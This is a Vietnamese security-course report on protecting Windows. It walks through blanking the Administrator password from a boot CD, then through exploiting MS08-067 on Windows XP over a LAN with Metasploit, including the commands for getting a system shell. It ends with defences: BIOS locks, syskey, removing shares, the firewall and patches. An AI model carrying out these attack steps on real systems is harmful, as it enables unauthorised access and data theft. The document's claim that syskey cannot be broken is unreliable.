1. Trang chủ
  2. » Công Nghệ Thông Tin

Bảo mật máy tính winddows

11 3 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Bảo mật máy tính Windows
Tác giả Trương Văn Cường
Trường học Trường Đại Học Athena
Chuyên ngành Khoa học máy tính
Thể loại Báo cáo
Định dạng
Số trang 11
Dung lượng 1,58 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

pandazip com 1 Bảo mật máy tính Winddows Nội dung Phần 1 Bảo mật máy tính Windows tránh các cách truy cập trái phép trực tiếp 1 Trình diễn kỹ thuật bẻ khóa mật khẩu tài khoản người dùng để truy cập và.

Trang 1

Bảo mật máy tính Winddows

Nội dung:

Phần 1: Bảo mật máy tính Windows tránh các cách truy cập trái phép trực tiếp

1 Trình diễn kỹ thuật bẻ khóa mật khẩu tài khoản người dùng để truy cập vào Windows

2 Phương pháp Phòng chống

Phần 2: Bảo mật máy tính Windows tránh việc truy cập gián tiếp từ xa thông qua môi trường mạng

1 Trình diễn phương pháp tấn công vào các máy tính từ xa thông qua mạng LAN, chiếm quyền

và ăn cắp dữ liệu trên các máy tính chạy hệ điều hành Windows

2 Phương pháp phòng chống

Đối tượng: Dành cho tất cả mọi người đang sử dụng máy tính chạy hệ điều hành Windows

Thực hiện:

Phần 1: Kỹ thuật bẻ khóa mật khẩu Windows

Sử dụng công cụ : Active Password Changer có sẵn trên Đĩa Hirenboot

Bước 1: Đặt đĩa Hirenboot vào khay đĩa sau đó khởi động máy tính bằng đĩa này

hình 1: thiết lập máy tính khởi động bằng đĩa CD

Lưu {: Sau khi thiết lập xong ta nhấn phím F10 trên bàn phím và chọn Yes

Khởi động lại máy tính-máy tính sẽ khởi động vào giao diện đĩa CD hirenboot

Trang 2

hình 2: giao diện Menu của Hirenboot

Chọn Dos Programs -> Password & Registry tools -> Active Password Changer

hình 3: giao diện của Active Password Changer

Chọn mục Số 1: Chosse Logical Drive -> Enter

hình 4: Danh sách các phân vùng ổ cứng trên máy tính (Vùng chứa Windows thường ở mục số

"0")

Bấm phím "0" -> Enter

Trang 3

hình 5: Liệt kê file "SAM" chứa dữ liệu mật khẩu

Nhấn phím "Enter" để tiếp tục

hình 6: danh sách các tài khoản người dùng Windows

Chọn tài khoản là Administrator (thường ở số "0") sau đó nhấn Enter

hình 7: danh sách tùy chọn

Ở bước này ta chỉ cần nhấn phím ''Y'' sau đó nhấn Enter -> mật khẩu của tài khoản

"Administrator" đã được khôi phục thành mật khẩu "trắng"

Khởi động lại Máy tính và dùng tài khoản "Administrator/null" để truy cập vào Windows

Trang 4

Phần 2: Kỹ thuật truy cập vào Windows từ xa qua mạng LAN Sử dụng phần mềm Metasploit

Chuẩn bị: Phần mềm Metasploit cài đặt trên Windows hoặc dùng Đĩa Backtrack 5

Bước 1: Kiểm tra địa chỉ IP của máy tính Windows XP, xem IP hiện tại của máy tính chạy

Backtrack

hình 8: IP hiện tại của máy chạy Backtrack 5: 172.16.30.97

hình 9: IP hiện tại của máy Windows XP: 172.16.30.98

Trang 5

Bước 2: Khởi động phần mềm Metasploit trên Backtrack: gỏ lệnh "msfconsole"

hình 10: giao diện Metasploit

Gỏ lệnh "use exploit/windows/smb/ms08_067_netapi" nhấn Enter

hình 11: thiết lập thông số để thực hiện tấn công chiếm quyền

Gỏ lần lượt các lệnh sau:

Set RHOST 172.16.30.98 # Gán thông số IP của Windows XP

Set LHOST 172.16.30.97 # Gán thông số IP của máy chạy Metasploit

exploit # Bắt đầu tấn công

Trang 6

hình 12: tấn công thành công

Gỏ tiếp "shell" -> Enter để truy cập giao diện "command-line" trên máy Windows XP

hình 13: Đã truy cập được vào chế độ "command-line" trên Windows XP với quyền Hệ thống Khai thác bằng các lệnh như: "net user"; "net local group"; "net share" để chiếm quyền

Windows XP hoặc lấy dữ liệu từ xa qua mạng LAN

Trang 7

Phần 3: Bảo mật

1 Giải pháp phòng chống truy cập trực tiếp vào máy tính Windows

a Khóa tính năng khởi động vào Hirenboot trên BIOS máy tính

hình 14: thiết lập chế độ ưu tiên khởi động vào máy tính bằng ổ đĩa cứng

hình 15: thiết lập mật khẩu truy cập vào BIOS nếu muốn chỉnh sửa thông tin trong BIOS

b Bổ sung mật khẩu hệ thống: Ngoài việc dùng mật khẩu cho tài khoản người dùng, ta có thể

bổ sung thêm mật khẩu cho hệ thống, khi khởi động vào Windows cần phải nhập mật khẩu này trước khi nhập mật khẩu tài khoản, như vậy ta sẽ có hai lần nhập mật khẩu Windows Hiện tại chưa có công cụ nào có thể bẻ được mật khẩu hệ thống

Trang 8

hình 16: chạy phần mềm "syskey"

Gỏ lệnh: Syskey -> Enter

Phần thiết lập mật khẩu hệ thống xuất hiện, chọn Update

hình 17: đặt mật khẩu khởi động

Chọn mục: Password Statup, gỏ tiếp mật khẩu cần thiết lập vào hai ô bên dưới, sau đó nhấn

"OK" Mật khẩu đã được lập khi khởi động vào Windows sẽ xuất hiện hộp thoại yêu cầu nhập mật khẩu này

Lưu {: Mật khẩu này hoàn toàn khác biệt và không liên quan đến các mật khẩu mà ta gán trên các tài khoản người dùng

Trang 9

hình 18: phải nhập mật khẩu hệ thống vào khi máy khởi động xong

Kết luận:

Cách thiết lập mật khẩu BIOS và thay đổi quyền ưu tiên khi khởi động có thể phá hủy bằng cách gỡ bỏ nguồn nuôi (PIN-CMOS) trên bo mạch chủ Cho nên ta không nhất thiết phải thiết lập bằng cách này trên các máy tính để bàn hoặc Server

Phương pháp thiết lập mật khẩu "Syskey" đơn giản và cực kz hiệu quả, ta có thể áp dụng cho mọi loại máy tính chạy các hệ điều hành Windows

2 Giải pháp phòng chống tấn công từ xa qua mạng LAN

Các bước thực hiện: Tắt toàn bộ các thư mục đang chia sẻ (Sharing), thiết lập Firewall cho máy tính

a Tắt các thư mục đang "share"

hình 19: Các thư mục đang "Share"

Trang 10

Gỏ lệnh "net share" để xem các thư mục đang chia sẻ

Gỏ lệnh "net share 'thư mục share' /del" để xóa thư mục đang share (Chỉ xóa share không xóa thư mục chứa dữ liệu"

b Thiết lập tường lửa "Firewall"

hình 20: bật firewall của máy tính Windows

Gỏ lệnh sau

netsh firewall set opmode mode=enable

Báo "OK" có nghĩa đã thiết lập thành công

c Cài đặt các bản vá (hotfix) của phiên bản Windows đang dùng (Windows XP)

Truy cập trang web: http://www.microsoft.com/en-us/download/details.aspx?id=3205

hình 21: download bản vá lỗi

Download bản vá lỗi sau đó tiến hành cài đặt bản vá, khởi động lại Windows

Tiến hành tấn công lại để kiểm tra kết quả bảo mật

Trang 11

Kết luận:

Phần mềm Metasploit có khả năng khai thác các lỗ hổng Windows, vì vậy ta thường xuyên cập nhật cho Windows bằng tính năng Autoupdate, hoặc download các bản vá lỗi khẩn cấp từ Microsoft để vá lỗi cho hệ điều hành Luôn tắt các thư mục "Share" sau khi đã sử dụng, luôn bật tính năng Firewall của Windows để phòng tránh tấn công và bảo vệ máy tính

Chúc các bạn thành công!

Trương Văn Cường - Giảng viên Trung tâm đào tạo quản trị & An ninh mạng ATHENA

Mọi thắc mắc xin liên hệ Email: cuongtv@athenavn.com hoặc cuong.t.v@live.com

Ngày đăng: 04/05/2023, 09:51

w